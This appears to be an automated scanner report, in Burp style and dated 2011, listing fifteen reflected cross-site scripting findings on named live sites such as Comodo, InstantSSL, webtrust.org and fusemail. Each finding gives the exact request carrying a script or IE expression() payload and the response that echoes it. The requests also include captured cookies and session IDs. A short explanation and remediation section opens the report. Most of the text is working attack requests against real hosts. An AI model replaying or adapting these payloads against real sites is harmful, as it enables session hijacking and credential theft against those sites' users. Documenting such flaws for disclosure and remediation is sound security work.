XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, BHDB, 09182011-01

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:

Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.

1.1. http://antivirus.comodo.com/antivirus_download.php [af parameter] next

Summary

Severity:	High
Confidence:	Certain
Host:	http://antivirus.comodo.com
Path:	/antivirus_download.php

Issue detail

The value of the af request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2a558"%20style%3dx%3aexpression(alert(1))%205e0a080bf20 was submitted in the af parameter. This input was echoed as 2a558\" style=x:expression(alert(1)) 5e0a080bf20 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /antivirus_download.php?af=11652a558"%20style%3dx%3aexpression(alert(1))%205e0a080bf20 HTTP/1.1
Host: antivirus.comodo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 11:04:25 GMT
Content-Type: text/html
Connection: close
Content-Length: 21233

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><script src="//cdn.optimiz
...[SNIP]...
<meta http-equiv="Refresh" Content = "1; URL=http://download.comodo.com/cis/download/installs/1000/partners/cav_installer_11652a558\" style=x:expression(alert(1)) 5e0a080bf20.exe"/>
...[SNIP]...

1.2. http://antivirus.comodo.com/antivirus_download.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://antivirus.comodo.com
Path:	/antivirus_download.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dc9a6"%20style%3dx%3aexpression(alert(1))%20e6a77e2098a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as dc9a6\" style=x:expression(alert(1)) e6a77e2098a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /antivirus_download.php?af=/dc9a6"%20style%3dx%3aexpression(alert(1))%20e6a77e2098a1165 HTTP/1.1
Host: antivirus.comodo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 11:04:31 GMT
Content-Type: text/html
Connection: close
Content-Length: 21235

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><script src="//cdn.optimiz
...[SNIP]...
<meta http-equiv="Refresh" Content = "1; URL=http://download.comodo.com/cis/download/installs/1000/partners/cav_installer_/dc9a6\" style=x:expression(alert(1)) e6a77e2098a1165.exe"/>
...[SNIP]...

1.3. http://antivirus.comodo.com/cis-pro_download.php [af parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://antivirus.comodo.com
Path:	/cis-pro_download.php

Issue detail

The value of the af request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2b08e"%20style%3dx%3aexpression(alert(1))%2046bb6f5d8d2 was submitted in the af parameter. This input was echoed as 2b08e\" style=x:expression(alert(1)) 46bb6f5d8d2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /cis-pro_download.php?af=11642b08e"%20style%3dx%3aexpression(alert(1))%2046bb6f5d8d2 HTTP/1.1
Host: antivirus.comodo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 11:04:29 GMT
Content-Type: text/html
Connection: close
Content-Length: 28859

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><script src="//cdn.optimiz
...[SNIP]...
<meta http-equiv="Refresh" Content = "1; URL=http://download.comodo.com/cis/download/installs/1000/partners/cispro_30day_installer_11642b08e\" style=x:expression(alert(1)) 46bb6f5d8d2.exe"/>
...[SNIP]...

1.4. http://antivirus.comodo.com/cis-pro_download.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://antivirus.comodo.com
Path:	/cis-pro_download.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5250f"%20style%3dx%3aexpression(alert(1))%207056823230 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5250f\" style=x:expression(alert(1)) 7056823230 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /cis-pro_download.php?af=/5250f"%20style%3dx%3aexpression(alert(1))%2070568232301164 HTTP/1.1
Host: antivirus.comodo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 11:04:51 GMT
Content-Type: text/html
Connection: close
Content-Length: 28859

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><script src="//cdn.optimiz
...[SNIP]...
<meta http-equiv="Refresh" Content = "1; URL=http://download.comodo.com/cis/download/installs/1000/partners/cispro_30day_installer_/5250f\" style=x:expression(alert(1)) 70568232301164.exe"/>
...[SNIP]...

1.5. https://cert.webtrust.org/SealFile [seal parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://cert.webtrust.org
Path:	/SealFile

Issue detail

The value of the seal request parameter is copied into the HTML document as plain text between tags. The payload bc2da<script>alert(1)</script>cd9dd7288d3 was submitted in the seal parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /SealFile?seal=1082bc2da<script>alert(1)</script>cd9dd7288d3&file=pdf HTTP/1.1
Host: cert.webtrust.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://cert.webtrust.org/ViewSeal?id=1082

Response

HTTP/1.1 500 Internal Server Error
Date: Sun, 18 Sep 2011 09:40:08 GMT
Content-Type: text/html
X-Cache: MISS from cert.webtrust.org
Connection: close
Content-Length: 3699

<html><head><title>Apache Tomcat/4.0.6 - Error report</title><STYLE><!--H1{font-family : sans-serif,Arial,Tahoma;color : white;background-color : #0086b2;} BODY{font-family : sans-serif,Arial,Tahoma;c
...[SNIP]...
<pre>java.lang.NumberFormatException: For input string: "1082bc2da<script>alert(1)</script>cd9dd7288d3"
   at java.lang.NumberFormatException.forInputString(NumberFormatException.java:48)
   at java.lang.Integer.parseInt(Integer.java:435)
   at java.lang.Integer.parseInt(Integer.java:476)
   at ca.cica.servlet
...[SNIP]...

1.6. https://cert.webtrust.org/ViewSeal [id parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://cert.webtrust.org
Path:	/ViewSeal

Issue detail

The value of the id request parameter is copied into the HTML document as plain text between tags. The payload 54a6b<script>alert(1)</script>313790a0b05 was submitted in the id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ViewSeal?id=108254a6b<script>alert(1)</script>313790a0b05 HTTP/1.1
Host: cert.webtrust.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.comodo.com/

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 09:40:03 GMT
Server: Apache Tomcat/4.0.6 (HTTP/1.1 Connector)
X-Cache: MISS from cert.webtrust.org
Connection: close
Content-Type: text/html
Content-Length: 2977

java.lang.NumberFormatException: For input string: "108254a6b<script>alert(1)</script>313790a0b05"
   at java.lang.NumberFormatException.forInputString(NumberFormatException.java:48)
   at java.lang.Integer.parseInt(Integer.java:435)
   at java.lang.Integer.parseInt(Integer.java:476)
   at ca.cica.servlet
...[SNIP]...

1.7. http://depot.activalive.com/app/deployment.php [d[] parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://depot.activalive.com
Path:	/app/deployment.php

Issue detail

The value of the d[] request parameter is copied into the HTML document as plain text between tags. The payload c8276<script>alert(1)</script>a430c58d40f was submitted in the d[] parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /app/deployment.php?id=6024&ptid=6024-1f8f8598c-d89e-453d-897a-4200ff97bc91&stid=1f8f8598c-d89e-453d-897a-4200ff97bc91&oref=http%253A%252F%252Fhome.j2.com%252Fenterprise%252Fenterprise.html&chat=null&r=0.3873252209741622&d[]=5365c8276<script>alert(1)</script>a430c58d40f&b[]=14918 HTTP/1.1
Host: depot.activalive.com
Proxy-Connection: keep-alive
Referer: http://www.fusemail.com/products/email-archiving/request-more-information/?utm_source=j2&utm_medium=crosssell&utm_campaign=enterprisepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 12:19:41 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.13
Content-Length: 228
Connection: close
Content-Type: text/javascript;charset=iso-8859-1

_alc.monitoring.push(5365);
_alc.__setStartDeptStatus(5365c8276<script>alert(1)</script>a430c58d40f, false);
_alc.__setStartDeptStatus(5365, false);
_alc.monitoringOff = true;
_alc.deployment_id = 6024;
_alc.license_id = 10869;

1.8. http://display.digitalriver.com/ [aid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://display.digitalriver.com
Path:	/

Issue detail

The value of the aid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1f583'-alert(1)-'56f1fd3f0b6 was submitted in the aid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?aid=2441f583'-alert(1)-'56f1fd3f0b6&tax=par HTTP/1.1
Host: display.digitalriver.com
Proxy-Connection: keep-alive
Referer: http://www.parallels.com/products/hsphere/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: op537homegum=a00602v02x278vq07m15wd278vr08s2xm1011; op393dr_homepage_demogum=a04006j09d2794r06b26c1afe; __utma=94877326.899275530.1315145846.1315145846.1315145846.1; __utmz=94877326.1315145846.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); op393dr_homepage_demo1gum=a04e07i0a12794q0643tzd2794r06b2ml33d0

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 11:41:06 GMT
Server: Apache/2.2.9
Expires: Sun, 18 Sep 2011 12:11:06 GMT
Last-Modified: Sun, 18 Sep 2011 11:41:06 GMT
Content-Length: 226
Connection: close
Content-Type: text/html

var dgt_script = document.createElement('SCRIPT');
dgt_script.src = document.location.protocol + '//a.netmng.com/?aid=2441f583'-alert(1)-'56f1fd3f0b6&tax=par';
document.getElementsByTagName('head')[0].appendChild(dgt_script);

1.9. http://display.digitalriver.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://display.digitalriver.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2a236'-alert(1)-'a4f07a80042 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /?aid=244&tax=par&2a236'-alert(1)-'a4f07a80042=1 HTTP/1.1
Host: display.digitalriver.com
Proxy-Connection: keep-alive
Referer: http://www.parallels.com/products/hsphere/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: op537homegum=a00602v02x278vq07m15wd278vr08s2xm1011; op393dr_homepage_demogum=a04006j09d2794r06b26c1afe; __utma=94877326.899275530.1315145846.1315145846.1315145846.1; __utmz=94877326.1315145846.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); op393dr_homepage_demo1gum=a04e07i0a12794q0643tzd2794r06b2ml33d0

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 11:41:07 GMT
Server: Apache/2.2.9
Expires: Sun, 18 Sep 2011 12:11:07 GMT
Last-Modified: Sun, 18 Sep 2011 11:41:07 GMT
Content-Length: 229
Connection: close
Content-Type: text/html

var dgt_script = document.createElement('SCRIPT');
dgt_script.src = document.location.protocol + '//a.netmng.com/?aid=244&tax=par&2a236'-alert(1)-'a4f07a80042=1';
document.getElementsByTagName('head')[0].appendChild(dgt_script);

1.10. http://display.digitalriver.com/ [tax parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://display.digitalriver.com
Path:	/

Issue detail

The value of the tax request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8ebc8'-alert(1)-'3a457381f57 was submitted in the tax parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /?aid=244&tax=par8ebc8'-alert(1)-'3a457381f57 HTTP/1.1
Host: display.digitalriver.com
Proxy-Connection: keep-alive
Referer: http://www.parallels.com/products/hsphere/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: op537homegum=a00602v02x278vq07m15wd278vr08s2xm1011; op393dr_homepage_demogum=a04006j09d2794r06b26c1afe; __utma=94877326.899275530.1315145846.1315145846.1315145846.1; __utmz=94877326.1315145846.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); op393dr_homepage_demo1gum=a04e07i0a12794q0643tzd2794r06b2ml33d0

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 11:41:06 GMT
Server: Apache/2.2.9
Expires: Sun, 18 Sep 2011 12:11:06 GMT
Last-Modified: Sun, 18 Sep 2011 11:41:06 GMT
Content-Length: 226
Connection: close
Content-Type: text/html

var dgt_script = document.createElement('SCRIPT');
dgt_script.src = document.location.protocol + '//a.netmng.com/?aid=244&tax=par8ebc8'-alert(1)-'3a457381f57';
document.getElementsByTagName('head')[0].appendChild(dgt_script);

1.11. http://j2global.tt.omtrdc.net/m2/j2global/mbox/standard [mbox parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://j2global.tt.omtrdc.net
Path:	/m2/j2global/mbox/standard

Issue detail

The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload 20938<script>alert(1)</script>a8a3b940bd4 was submitted in the mbox parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /m2/j2global/mbox/standard?mboxHost=www.trustfax.com&mboxSession=1316364084200-226831&mboxPage=1316364084200-226831&screenHeight=1200&screenWidth=1920&browserWidth=1097&browserHeight=869&browserTimeOffset=-300&colorDepth=16&mboxCount=1&mbox=TF_xs_adClick_globalfooter20938<script>alert(1)</script>a8a3b940bd4&mboxId=0&mboxTime=1316346084298&mboxURL=http%3A%2F%2Fwww.trustfax.com%2F&mboxReferrer=http%3A%2F%2Fwww.vengine.com%2Fproducts%2Fprove_it.html&mboxVersion=39 HTTP/1.1
Host: j2global.tt.omtrdc.net
Proxy-Connection: keep-alive
Referer: http://www.trustfax.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Content-Length: 222
Date: Sun, 18 Sep 2011 11:41:24 GMT
Server: Test & Target

mboxFactories.get('default').get('TF_xs_adClick_globalfooter20938<script>alert(1)</script>a8a3b940bd4',0).setOffer(new mboxOfferDefault()).loaded();mboxFactories.get('default').getPCId().forceId("1316364084200-226831.19");

1.12. https://secure.comodo.com/home/purchase.php [pid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://secure.comodo.com
Path:	/home/purchase.php

Issue detail

The value of the pid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c5cb8"%20style%3dx%3aexpression(alert(1))%20f1eaf6a60d7 was submitted in the pid parameter. This input was echoed as c5cb8\" style=x:expression(alert(1)) f1eaf6a60d7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /home/purchase.php?pid=9c5cb8"%20style%3dx%3aexpression(alert(1))%20f1eaf6a60d7&utm_source=pfw_fd&utm_medium=buy_free_download&af=1144&utm_campaign=PF_CIS_BUY_FD HTTP/1.1
Host: secure.comodo.com
Connection: keep-alive
Referer: http://personalfirewall.comodo.com/free-download.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optimizelyEndUserId=oeu1315419552319r0.6822604623157531; kvcd=1316328651224; km_ai=nxNThomVDaBwwqN7xx0NPXpwd58%3D; km_vs=1; km_lv=1316328651; km_uq=; optimizelyCustomEvents=%7B%228018129%22%3A%5B%22Need%20a%20pc%20expert%20try%20it%20now%20button%22%5D%7D; optimizelyBuckets=%7B%228015120%22%3A8013305%2C%228022314%22%3A8017411%7D; __utma=1.355449779.1315419555.1315419555.1315419555.1; __utmb=1.4.10.1316328649; __utmc=1; __utmz=1.1315419555.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)|utmctr=comodo

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 01:51:42 GMT
Content-Type: text/html
Connection: keep-alive
Keep-Alive: timeout=5
Vary: Accept-Encoding
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 43034

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script src="//cdn.opti
...[SNIP]...
<a href="includes/video.php?pid=9c5cb8\" style=x:expression(alert(1)) f1eaf6a60d7" id="video">
...[SNIP]...

1.13. https://secure.instantssl.com/products/SSLIdASignup1a [loginErrorMessage parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://secure.instantssl.com
Path:	/products/SSLIdASignup1a

Issue detail

The value of the loginErrorMessage request parameter is copied into the HTML document as plain text between tags. The payload 16f0f<script>alert(1)</script>780d4eeba57afd885 was submitted in the loginErrorMessage parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /products/SSLIdASignup1a?SID=NtcydAl8wNmXs5S2&product=342&days=90&loginName=&loginPassword=&loginErrorMessage=16f0f<script>alert(1)</script>780d4eeba57afd885 HTTP/1.1
Host: secure.instantssl.com
Connection: keep-alive
Referer: https://secure.instantssl.com/products/frontpage?area=SSL&product=342&days=90&ap=InstantSSL
Cache-Control: max-age=0
Origin: https://secure.instantssl.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optimizelyEndUserId=oeu1316328656750r0.6942118240986019; __utmx=261615573.; __utmxx=261615573.; optimizelyBuckets=%7B%229298079%22%3A9298080%7D; __utma=261615573.129590781.1316328660.1316328660.1316362417.2; __utmb=261615573; __utmc=261615573; __utmz=261615573.1316362417.2.2.utmccn=(referral)|utmcsr=comodo.com|utmcct=/e-commerce/ssl-certificates/free-ssl-cert.php|utmcmd=referral

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 11:13:39 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Keep-Alive: timeout=5
Vary: Accept-Encoding
Pragma: no-cache
Cache-Control: max-age=-1
Expires: -1
Content-Length: 18158

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>InstantSSL Security Services</title>
<link rel=stylesheet href=/css/css.css>
</head>
<body bgcolor=#99999
...[SNIP]...
<span class=error>16f0f<script>alert(1)</script>780d4eeba57afd885</span>
...[SNIP]...

1.14. https://secure.instantssl.com/products/SSLIdASignup1a [loginPassword parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://secure.instantssl.com
Path:	/products/SSLIdASignup1a

Issue detail

The value of the loginPassword request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ef2a4"><script>alert(1)</script>caff33464a191e275 was submitted in the loginPassword parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /products/SSLIdASignup1a?SID=NtcydAl8wNmXs5S2&product=342&days=90&loginName=&loginPassword=ef2a4"><script>alert(1)</script>caff33464a191e275&loginErrorMessage= HTTP/1.1
Host: secure.instantssl.com
Connection: keep-alive
Referer: https://secure.instantssl.com/products/frontpage?area=SSL&product=342&days=90&ap=InstantSSL
Cache-Control: max-age=0
Origin: https://secure.instantssl.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optimizelyEndUserId=oeu1316328656750r0.6942118240986019; __utmx=261615573.; __utmxx=261615573.; optimizelyBuckets=%7B%229298079%22%3A9298080%7D; __utma=261615573.129590781.1316328660.1316328660.1316362417.2; __utmb=261615573; __utmc=261615573; __utmz=261615573.1316362417.2.2.utmccn=(referral)|utmcsr=comodo.com|utmcct=/e-commerce/ssl-certificates/free-ssl-cert.php|utmcmd=referral

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 11:13:35 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Keep-Alive: timeout=5
Vary: Accept-Encoding
Pragma: no-cache
Cache-Control: max-age=-1
Expires: -1
Content-Length: 18077

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>InstantSSL Security Services</title>
<link rel=stylesheet href=/css/css.css>
</head>
<body bgcolor=#99999
...[SNIP]...
<input type=password name=loginPassword maxlength=128 size=15 value="ef2a4"><script>alert(1)</script>caff33464a191e275" class=input2>
...[SNIP]...

1.15. http://www.fusemail.com/products/email-archiving/request-more-information/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.fusemail.com
Path:	/products/email-archiving/request-more-information/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c801c'><script>alert(1)</script>215844610ea was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c801c\\\'><script>alert(1)</script>215844610ea in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /products/email-archiving/request-more-information/?utm_source=j2&utm_medium=crosssell&utm_campaign=enterprisepage&c801c'><script>alert(1)</script>215844610ea=1 HTTP/1.1
Host: www.fusemail.com
Proxy-Connection: keep-alive
Referer: http://home.j2.com/enterprise/enterprise.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 12:19:52 GMT
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
X-Pingback: http://www.fusemail.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Content-Length: 28034

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/x
...[SNIP]...
<form method='post' enctype='multipart/form-data' id='gform_1' action='/products/email-archiving/request-more-information/?utm_source=j2&utm_medium=crosssell&utm_campaign=enterprisepage&c801c\\\'><script>alert(1)</script>215844610ea=1'>
